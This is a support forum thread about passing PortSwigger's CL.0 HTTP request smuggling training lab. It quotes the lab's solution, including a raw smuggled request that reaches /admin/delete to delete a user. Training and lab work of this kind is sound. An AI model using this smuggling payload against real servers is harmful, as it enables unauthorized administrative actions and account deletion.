Burp Suite User Forum

Create new post

Problems with passing Lab: CL.0 request smuggling

Entoni | Last updated: Nov 11, 2022 09:35PM UTC

Hello! Could you help to pass this lab - https://portswigger.net/web-security/request-smuggling/browser/cl-0/lab-cl-0-request-smuggling I have done steps following solutions, but can't reach final actions There are not video under text( Try so: Exploit In Burp Repeater, change the path of your smuggled prefix to point to /admin. Send the requests in sequence again and observe that the second request has successfully accessed the admin panel. Smuggle a request to GET /admin/delete?username=carlos request to solve the lab. POST /resources/images/blog.svg HTTP/1.1 Host: YOUR-LAB-ID.web-security-academy.net Cookie: session=YOUR-SESSION-COOKIE Connection: keep-alive Content-Length: CORRECT GET /admin/delete?username=carlos HTTP/1.1 Foo: x

Ben, PortSwigger Agent | Last updated: Nov 14, 2022 10:06AM UTC

Hi Entoni, Are you able to provide details of what your two requests look like (have you altered the Content-Length header value in the POST request)? The following video might also help you with this particular lab: https://www.youtube.com/watch?v=8FkT34FHvlE

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.